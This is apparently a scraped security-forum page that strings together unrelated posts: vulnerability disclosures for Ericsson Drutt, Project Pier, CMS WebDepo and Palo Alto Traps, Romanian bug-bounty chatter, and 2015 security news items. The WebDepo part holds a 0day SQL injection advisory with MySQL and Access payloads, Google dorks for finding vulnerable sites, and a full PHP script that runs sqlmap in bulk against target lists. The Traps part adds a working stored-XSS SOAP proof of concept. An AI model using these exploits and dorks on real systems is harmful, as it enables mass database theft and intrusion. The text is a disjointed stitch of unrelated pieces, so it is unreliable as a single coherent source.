http://<drutt>:<port>/jsp/start-3pi-manager.jsp?url=http://www.google.com +---------------------+ + Disclosure Timeline + +---------------------+ 17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback 24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office 24.Feb.2015 - Contacted Corporate Security Office team 02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel 02.Mar.2015 - Shared vulnerability details 06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches 08.Mar.2015 - Agreed on public disclosure timelines 12.Mar.2015 - Patches released 31.Mar.2015 - Public disclosure

I was doing my RASP (Runtime Application Self-Protection) module testing on the latest version of Project Pier i.e. 0.8.8 SP2 yesterday and found an XSS vulnerability in search. http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E <http://www.prop.com/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E> The xss occurs after authentication. Thanks, Jaydeep Dave Source

Advisory: SQLi-vulnerabilities in aplication CMS WebDepo Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014) Vendor URL: http://www.webdepot.co.il Vendor Status: 0day ========================== Vulnerability Description: ========================== Records and client practice management application CMS WebDepo suffers from multiple SQL injection vulnerabilitie ========================== Technical Details: ========================== SQL can be injected in the following GET GET VULN: wood=(id) $wood=intval($_REQUEST['wood']) ========================== SQL injection vulnerabilities ========================== Injection is possible through the file text.asp Exploit-Example: DBMS: 'MySQL' Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) DBMS: 'Microsoft Access' Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 Ex: http://target.us/text.asp?wood=(id)+Exploit ========================== SCRIPT EXPLOIT ========================== http://pastebin.com/b6bWuw7k --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html ========================== GOOGLE DORK ========================== inurl:"text.asp?wood=" site:il inurl:"text.asp?wood=" site:com inurl:"text.asp?wood=" ========================== Solution: ========================== Sanitizing all requests coming from the client ========================== Credits: ========================== AUTOR: Cleiton Pinheiro / Nick: googleINURL Blog: http://blog.inurl.com.br Twitter: https://twitter.com/googleinurl Fanpage: https://fb.com/InurlBrasil Pastebin http://pastebin.com/u/Googleinurl GIT: https://github.com/googleinurl PSS: http://packetstormsecurity.com/user/googleinurl YOUTUBE: http://youtube.com/c/INURLBrasil PLUS: http://google.com/+INURLBrasil ========================== References: ========================== [1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html [2] https://msdn.microsoft.com/en-us/library/ff648339.aspx Exploit: <?php /* # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil # EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL # VENTOR: http://www.webdepot.co.il # GET VULN: wood=(id) # $wood=intval($_REQUEST['wood']) ----------------------------------------------------------------------------- # DBMS: 'MySQL' # Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # DBMS: 'Microsoft Access' # Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16 ----------------------------------------------------------------------------- # http://target.us/text.asp?wood=(id)+Exploit # GOOGLE DORK: inurl:"text.asp?wood=" # GOOGLE DORK: site:il inurl:"text.asp?wood=" # GOOGLE DORK: site:com inurl:"text.asp?wood=" # --help: -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php WebDepoxpl.php -t target php WebDepoxpl.php -f targets.txt php WebDepoxpl.php -t target -p 'http://localhost:9090' ----------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR # COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'" # DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR ----------------------------------------------------------------------------- # TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); $folder_SqlMap = "python ../sqlmap/sqlmap.py"; $op_ = getopt('f:t:p:', array('help::')); echo " _____ (_____) ____ _ _ _ _ _____ _ ____ _ _ (() ()) |_ _| \ | | | | | __ \| | | _ \ (_) | \ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___ _| | \ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __| | | /=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \ | | [___] |_____|_| \_|\____/|_| \_\______| |____/|_| \__,_|___/_|_| \n\033[1;37m0xNeither war between hackers, nor peace for the system.\n [+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL BRASIL\nhelp: --help\033[0m\n\n"; $menu = " -t : SET TARGET. -f : SET FILE TARGETS. -p : SET PROXY Execute: php 0dayWebDepo.php -t target php 0dayWebDepo.php -f targets.txt php 0dayWebDepo.php -t target -p 'http://localhost:9090' \n"; echo isset($op_['help']) ? exit($menu) : NULL; $params = array( 'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL, 'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL, 'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL, 'folder' => $folder_SqlMap, 'line' => "-----------------------------------------------------------------------------------" ); not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL; not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL; not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL; function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE; } function __plus() { ob_flush(); flush(); } function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS LOADED : " . count($tgt_) . "\033[0m\n"; foreach ($tgt_ as $url) { echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING : {$url} \033[0m\n"; __plus(); $file['target'] = $url; __exec($file) . __plus(); } } function __exec($params) { __plus(); echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO] starting SqlMap...\n"; echo "[+] [" . date("H:i:s") . "] [INFO] TARGET: {$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n"; $command = "python ../sqlmap/sqlmap.py -u '{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL {$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2"; system($command, $dados) . empty($dados[0]) ? exit() : NULL; __plus(); } Source

#!/usr/bin/ruby =begin ------------------------------------------------------------------------ Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection) Vendor: Palo Alto Networks Vulnerable Version(s): 3.1.2.1546 Tested Version: 3.1.2.1546 Advisory Publication: 29 March 2015 Vendor Notification: 17 October 2014 Vulnerability Type: Stored Cross Site Scripting CVE Reference: CVE-2015-2223 Risk Level: High Solution Status: Discovered and Provided: Michael Hendrickx, help AG ------------------------------------------------------------------------ About the product: Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this “trap” to a central server for logging purposes. About the vulnerability: An attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps’ admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser. The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example: <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments> A POC script can be found at the following URL: https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb ------------------------------------------------------------------------ Solution: The vendor was notified back in October 2014, and a we’ve sent a few follow ups since. Contact the vendor for the patch details. References: [1] help AG middle East: http://www.helpag.com/ [2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html ------------------------------------------------------------------------ =end # PA traps fuzzer? require 'net/http' def usage puts "pa_traps.rb <trapserver>" exit end usage if ARGV.empty? # get the arguments traps = {} traps[:server] = ARGV[0] traps[:port] = 2125 http_headers = { "Content-Type" => "application/soap+xml; charset=utf-8", "Expect" => "100-continue", "Connection" => "Keep-Alive" } soap_envelope = <<-SOAP <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing"> <s:Header> <a:Action s:mustUnderstand="1">http://tempuri.org/IClientServices/SendPreventions</a:Action> <a:MessageID>urn:uuid:d1bdb437-ea8e-47e8-8167-6cfd69655f43</a:MessageID> <a:ReplyTo> <a:Address>http://www.w3.org/2005/08/addressing/anonymous</a:Address> </a:ReplyTo> <a:To s:mustUnderstand="1">http://10.13.6.82:2125/CyveraServer/</a:To> </s:Header> <s:Body> <SendPreventions xmlns="http://tempuri.org/"> <machine>VMNAME1</machine> <preventions xmlns:b="http://schemas.datacontract.org/2004/07/Cyvera.Common.Interfaces" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"> <b:PreventionDetails> <b:Id>0</b:Id> <b:MachineName>AEDXBNB-MHE</b:MachineName> <b:Message>Exploit attempt was prevented by Traps</b:Message> <b:PreventionKey>116215ce-65e2-4b77-b176-6c0279d12c37</b:PreventionKey> <b:ProcessName>Excel.exe</b:ProcessName> <b:Time>2014-10-15T13:18:56</b:Time> <b:UserName> HELPAG\\hendrickx </b:UserName> <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments> <b:CyveraCode>EXEPROT</b:CyveraCode> <b:CyveraInternalCode i:nil="true"/> <b:CyveraVersion>3.1.2.1546</b:CyveraVersion> <b:FileName> <script> alert("xss"); </script> </b:FileName> <b:PreventionMode>Notify</b:PreventionMode> <b:ProcessHash i:nil="true"/> <b:ProcessVersion>1.12.1.0</b:ProcessVersion> <b:Sent>false</b:Sent> <b:SentToServerTime>0001-01-01T00:00:00</b:SentToServerTime> <b:Source>Unknown</b:Source> <b:Status i:nil="true"/> <b:URL> <script> alert("xss in URL"); </script> </b:URL> </b:PreventionDetails> </preventions> </SendPreventions> </s:Body> </s:Envelope> SOAP if traps[:server].empty? puts "Need a traps server" usage end # summary puts "Testing #{traps[:server]}" Net::HTTP.start(traps[:server], traps[:port]) do |http| r1 = http.request_post('/CyveraServer/', soap_envelope, http_headers); puts r1 puts r1.inspect end Source

Nu conteaza ce primesti man, nu am stat sa caut vulnerabilitati pentru un tricou si un stick. Am facut asta pentru a ajuta, nu inteleg de ce toti va invartiti in jurul "banilor" poate unii dintre noi ajutam fiindca asa vrem nu pentru a primi ceva. @askvrit pai da man dar sa iti trimita mesaj ca e duplicat dupa ce au zis prima data ca e bun, e chiar penibil.

M-am bagat si eu sa fie cu noroc.

Imagine — reaching into your pocket — and pulling out a computer! Google has made it possible to put your whole computer into your pocket by introducing a whole new kind of Chrome device — a tiny stick that plugs into HDMI port of any display. Dubbed ChromeBit, a fully featured computer-on-a-stick from Asus that Google promises to retail for less than $100 when it comes out this summer. You just need to plug a Chromebit right into your TV or any monitor in order to turn it into a full-fledged Chrome OS-based computer. Google Chromebit is portable with an impressive look and will be available in three attractive colors — silver, blue and orange. It has a smarter clinch on the business end so that a user can easily plug it into practically any HDMI port without the need of any extension cable. SPECIFICATIONS This tiny little Google ChromeBit stick packaged with: Rockchip RK3288 (with quad-core Mali 760 graphics) 2GB of RAM 16GB of solid state storage memory a single full-size USB 2.0 port Bluetooth 4.0 Smart Ready controller WiFi 802.11 ac support ARM Mali 760 quad-core GPU Although Google Chromebit will not be the most powerful computer you could plug into your TV, it should not be too bad for the browser-based operating systems. Google believes that Chromebit will be of great use in schools and small businesses due to its price and easy manageability. $149 CHROMEBOOK In addition to Chromebit, Google also announced several cheap Chrome devices, including Haier Chromebook 11 (available online at Amazon) and Hisense Chromebook (available at Walmart). Both are 11.6-inch Chromebooks will be available at $149, making them cheaper and affordable than most smartphones. The basic specifications for the Haier and Hisense Chromebooks are essentially the same with 2GB of RAM, feature two USB ports, 16GB solid flash storage, SD Card reader and HDMI output, as well as 720p webcam and WiFi and Bluetooth antennas. $249 CHROMEBOOK FLIP The technology giant also announced that ASUS plans to launch a new "Chromebook Flip" convertible with the same internals later this spring for $249. Chromebook Flip will come with a 10.1-inch touchscreen display that flips all the way around so the device can be used in tablet mode. Source

The Department of Homeland Security sponsored CERT at Carnegie Mellon University on Tuesday released an advisory warning infrastructure providers of a vulnerability in Multicast DNS, or mDNS, that could leak device information that could be leveraged in high volume DDoS amplification attacks. “I would say the most serious concern with a vulnerability like this is abuse for DDoS campaigns, since it’s using UDP (easily spoofable) and the amplification in most cases is well over 100 percent,” said security researcher Chad Seaman, who reported the vulnerability. “We’ve seen a huge surge in the abuse of SSDP devices being used in reflection attacks, this is along the same lines and offers greater amplification, but luckily there aren’t nearly as many vulnerable mDNS devices in the wild.” The advisory lists a number of vendors whose devices are affected, including Canon, HP and IBM among others. Cisco, D-Link and Microsoft devices are in the clear, while whether Apple, a number of Linux distributions, and Dell devices are affected. Mostly, mDNS is used in consumer devices to simplify configuration and integration of services and networking, Seaman said. The issue is that mDNS devices could respond to unicast queries from outside a local link network and those responses could include network and device data that would facilitate a large-scale DDoS attack. According to the advisory, mDNS enables devices on a local link network to discover other services and devices. The fact that some devices would respond to unicast queries from outside goes against the implementation recommendations in RFC 6762. “It’s very easy to abuse. It’s little more than running a standard DNS query for a specific string/service name on port 5353. If you get a reply to the most generic query, the machine is accepting input over the WAN interface that it shouldn’t be,” Seaman said. The leaked information depends on the particular device and how the service it supports is configured. The useful information includes device names, model numbers, serial numbers, network configuration information, and more. “These could be used for social engineering attacks, targeting purposes, reconnaissance purposes, etc.,” Seaman said. The CERT advisory recommends either blocking inbound and outbound mDNS on the WAN, or disabling mDNS services. As with other noteworthy amplification attacks, large amounts of bad traffic is pointed at a specific online service, in most cases, over-running it in short order. “As a reflector it would just be a high number of incoming DNS queries targeted at port 5353, likely from a spoofed source to achieve reflection. As a victim you would see a wide array of replies coming back from various devices,” said Seaman, who has posted sample traffic signatures that would be similar to those used in such an attack. “However because of mDNS explicitly stating it should only operate on port 5353 in the RFC, all requests will be sourced from port 5353 during the reflection. Meaning mitigation should be as simple as blocking port 5353 to protect vulnerable internal devices and drop incoming traffic sourced from port 5353 to help mitigate an attack.” Source

Google is preparing to release new research on the prevalence of ad injectors, the often-unwanted browser extensions that inject ads onto Web pages, and the numbers will show just how widespread and problematic the software is. Ad injectors belong to that great, amorphous pile of applications that aren’t necessarily classed as malware but exhibit behavior that is unwanted by users. They’re designed to push ads onto the pages that users visit and they typically come in the form of browser extensions. Users sometimes install them purposely, but often ad injectors come bundled with other applications and can be difficult to remove. Google has been adjusting the way that it handles deceptive and unwanted software and its Chrome browser will display a warning when a user is going to download an ad injector from the Chrome Web store. The company doesn’t ban all ad injectors across the board, but will remove deceptive apps from the Web store. Google said that it has received more than 100,000 complaints from Chrome users about ad injectors in just the past three months. In a few weeks, Google plans to release some joint research on ad injectors it did with the University of California at Berkeley. Some of the findings that came out of the research make it clear that ad injectors represent a fairly large-scale problem for users: Ad injectors were detected on all operating systems (Mac and Windows), and web browsers (Chrome, Firefox, IE) that were included in our test. More than 5% of people visiting Google sites have at least one ad injector installed. Within that group, half have at least two injectors installed and nearly one-third have at least four installed. Thirty-four percent of Chrome extensions injecting ads were classified as outright malware. Google’s Nav Jagpal said in a blog post that the research found nearly 200 deceptive extensions in the Chrome Web store, which have been disabled. Jagpal said Google plans to release the full results of the research on May 1. Source

Am mai raportat unul acum 5 zile abia azi a venit raspunsul. Nu e mult dar merge. XSS-ul era in form-ul de adaugare a unui anunt.

Internet users outside China are unwittingly participating in a long-running cyber-attack on the coding site GitHub, security experts have said. The researchers believe that the nature of the attack makes the Chinese government the only realistic source. After five days, it was understood on Tuesday evening that the attack was decreasing in intensity. The Chinese government said it was "odd" that it had been accused of being responsible. GitHub said that it had first detected a large distributed denial of service (DDoS) attack - when a site is flooded with traffic, threatening to force it offline - last Thursday. Four separate security researchers have said that international web traffic to sites that use analytics tools provided by search firm Baidu was being hijacked in China. According to analysis published by Erik Hjelmvik of the firm Netresec, when browsers requested script from the Chinese firm's servers, as they normally would, malicious code was inserted into the reply. "The upshot is that people from around the world... had their traffic redirected to swamp GitHub," Prof Alan Woodward of the University of Surrey told the BBC after verifying the research. It is alleged that the attack was targeted at two pages on GitHub: one created by the anti-censorship group Greatfire.org, the other a Chinese-language edition of the New York Times. Both are banned by the Chinese authorities. Mr Hjelmvik's analysis was backed up by similar research published by Insight Labs, a global group of security organisations. Their conclusions were ratified by both Rik Ferguson, from the cybersecurity firm Trend Micro, and Prof Woodward. In a blog, Mr Hjelmvik described the attack step-by-step: An innocent user browses the internet from outside China One website the user visits loads an analytics script - a sequence of instructions - from a server in China, for example Baidu, something that often used by web admins to track visitor statistics The web browser's request for the Baidu script is detected by Chinese equipment as it enters the country A fake response is sent out from within China instead of the actual Baidu Analytics script. This fake response is a malicious script that tells the user's browser to continuously reload two specific pages on GitHub.com 'Malicious' The method could be used on a multitude of sites that passed into and back out of China, the researchers said. "Any site that makes the request for a cookie related to Baidu's analytics, that request could be replaced with malicious code," said Mr Ferguson. Mr Hjelmvik told the BBC that, because the various internet service providers used by the foreign internet users were seeing the same results, the attacker could only be an entity with overarching control of telecommunications across China. That, he said, made the country's authorities the most realistic suspect. In a press conference on Monday, the Chinese foreign ministry's spokeswoman Hua Chunying was asked for her response to reports that her government was behind the attack. "It is quite odd that every time a website in the US or any other country is under attack, there will be speculation that Chinese hackers are behind it. I'd like to remind you that China is one of the major victims of cyber attacks," she said. "We have been underlining that China hopes to work with the international community to speed up the making of international rules and jointly keep the cyberspace peaceful, secure, open and cooperative. "It is hoped that all parties can work in concert to address hacker attacks in a positive and constructive manner." The BBC understands that the attack appears to be weakening and GitHub is now said to be operating "at 100%". A GitHub spokesman reiterated its earlier statement, highlighting that the attack was the "largest DDoS" in the site's history. Source

Uber insisted it had not been hacked following the discovery that log-in information for thousands of the car-sharing service's users is widely available on the online black market. Motherboard confirmed last week that several dark Web forums — hidden from the regular internet using the online anonymity software Tor — were selling working log-ins for Uber for as little as $1. Uber denies the information was taken from its own servers, however. “We investigated and found no evidence of a breach,” the company said in a statement. “Attempting to fraudulently access or sell accounts is illegal and we notified the authorities about this report.” An Uber log-in can not only be used to rack up fraudulent trips, but would also give access to the user’s travel history, exposing home addresses. An account also contains partial credit card information. Uber said the log-ins might have been lifted by either breaking weak passwords, or by trying passwords exposed in other data breaches. “This is a good opportunity to remind people to use strong and unique usernames and passwords, and to avoid reusing the same credentials across multiple sites and services,” Uber said. The company’s data security has made headlines in recent months. In late February, it came out that the personal information of up to 50,000 drivers had been compromised during a May 2014 breach. The 2014 hack is not related to the current rash of Uber log-ins for sale, the company said. Source

AROUND THE SAME time the US and Israel were already developing and unleashing Stuxnet on computers in Iran, using five zero-day exploits to get the digital weapon onto machines there, the government realized it needed a policy for how it should handle zero-day vulnerabilities, according to a new document obtained by the Electronic Frontier Foundation. The document, found among a handful of heavily redacted pages released after the civil liberties group sued the Office of the Director of National Intelligence to obtain them, sheds light on the backstory behind the development of the government’s zero-day policy and offers some insight into the motivations for establishing it. What the documents don’t do, however, is provide support for the government’s assertions that it discloses the “vast majority” of zero-day vulnerabilities it discovers instead of keeping them secret and exploiting them. “The level of transparency we have now is not enough,” says Andrew Crocker a legal fellow at EFF. “It doesn’t answer a lot of questions about how often the intelligence community is disclosing, whether they’re really following this process, and who is involved in making these decisions in the executive branch. More transparency is needed.” The timeframe around the development of the policy does make clear, however, that the government was deploying zero-days to attack systems long before it had established a formal policy for their use. Task Force Launched in 2008 Titled “Vulnerability Equities Process Highlights,” (.pdf) the document appears to have been created July 8, 2010, based on a date in its file name. Vulnerability equities process in the title refers to the process whereby the government assesses zero-day software security holes that it either finds or buys from contractors in order to determine whether they should be disclosed to the software vendor to be patched or kept secret so intelligence agencies can use them to hack into systems as they please. The government’s use of zero-day vulnerabilities is controversial, not least because when it withholds information about software vulnerabilities to exploit them in targeted systems, it leaves every other system that use the same software also vulnerable to being hacked, including U.S. government computers and critical infrastructure systems. According to the document, the equities process grew out of a task force the government formed in 2008 to develop a plan for improving its ability “to use the full spectrum of offensive capabilities to better defend U.S. information systems.” Source

Facebook is in violation of EU data laws owing to its overly complex privacy policies and persistent tracking of users, even if they have opted out of such systems. This was the key claim in a report by researchers at the University of Leuven and the Free University of Brussels on behalf of the Belgian Privacy Commission. “Our analysis indicates [that] Facebook is acting in violation of European law,” the report said. Specifically, the researchers are concerned that almost all data tracking and monitoring done by Facebook, such as for advertising purposes or gathering location data, is done without giving users adequate control over their privacy. “Its current default settings with regards to behavioural profiling and advertising (essentially 'opt-out') remain problematic,” the report said. “According to the Article 29 Working Party, consent cannot be inferred from the data subject’s inaction with regard to behavioural marketing. “As a result, Facebook’s opt-out system for advertising does not meet the requirements for legally valid consent. In addition, opt-outs for 'Sponsored Stories' or collection of location data are simply not provided.” The way Facebook combines data from its other services, specifically Instagram and WhatsApp, to build a more complete picture of a user was also cited as another way in which Facebook does not adhere to EU privacy and data laws. “Facebook only offers an opt-out system for its users in relation to profiling for third-party advertising purposes. The current practice does not meet the requirements for legally valid consent,” the report said. The report also criticised Facebook for “leveraging its dominant position” in the social networking market to effectively force users to accept its conditions. “The choices Facebook offers to its users are limited. For many data uses, the only choice for users is to simply 'take it or leave it'. If they do not accept, they can no longer use Facebook and may miss out on content exclusively shared on this platform,” the researchers said. Another interesting area raised in the report relates to the rights, or lack of, that Facebook provides to delete an account and have all data removed from the firm's databases. "Facebook fails to provide (sufficient) granularity in exercising data subject’s rights. For example, the right to erasure can only be exercised with regard to the user’s profile and only relates to self-posted content," it said. V3 contacted Facebook for its response to the report but had received no reply at the time of publication. The damning allegations come just a few months after Facebook updated its terms and conditions in an effort to make it easier for people to "take charge" of how their data is used on the site. Source

Security bod Kamil Hismatullin has disclosed a simple method to delete any video from YouTube. The Russian software developer and hacker found videos can be instantly nuked by sending the identity number of a video in a post request along with any token. Google paid the bug hunter US$5000 for the find along with $1337 under its pre-emptive vulnerability payment scheme in which it slings cash to help recognised researchers find more bugs. "I wanted to find there some CSRF or XSS issues, but unexpectedly discovered a logical bug that let me to delete any video on YouTube with just one request," Hismatullin says. "... this vulnerability could create utter havoc in a matter of minutes in [hackers'] hands who could extort people or simply disrupt YouTube by deleting massive amounts of videos in a very short period of time." Hismatullin says Google responded quickly when he reported the bug Saturday. He says he spent seven hours finding the bugs and resisted the near overwhelming urge to "clean up Bieber's channel". Google's Vulnerability Research Grants is described as cash with "no strings attached" that allows known security bods to apply for US$3133.70 to begin bug hunting expeditions. The search and service giant handed out some $1.5 million last year to bug hunters for reporting vulnerabilities Source+video

A trio of university undergraduates have worked with Mozilla to create an online threat modelling tool designed to help system administrators better understand the threats they face. The open source SeaSponge tool, developed under Mozilla's Winter of Security initiative, sports a graphical flow its designers say could be a replacement for Microsoft's free Threat Modelling Tool. Saint Mary's University students Sarah MacDonald, Joel Kuntz, and Glavin Wiechert built the tool. "SeaSponge allows you to model a system so that potential threats and risks can be identified," MacDonald says."It supports multiple diagrams to model logical sections of your system in separate locations. "Each diagram contains data flows and hardware and logical components" The trio says they developed the HTML5 tool because threat modelling, while important, is often missed in the software development lifecycle. The tool is built in part on Angularjs; jsPlumb; Bootstrap; CoffeeScript; Grunt; Bower, and Compass, and works on all browsers and operating systems. Developers focused on making SeaSponge easy to use and aesthetically pleasing to bring the "pizzazz" back into threat modeling. MacDonald says SeaSponge is still infancy and called on interested developers to contribute to its code. The Winter of Code project announcement follows the development of the Masche forensics tool which the browser giant had considered integrating into its architecture. Admins can play with a live demo of SeaSponge or download it from GitHub. Source+Video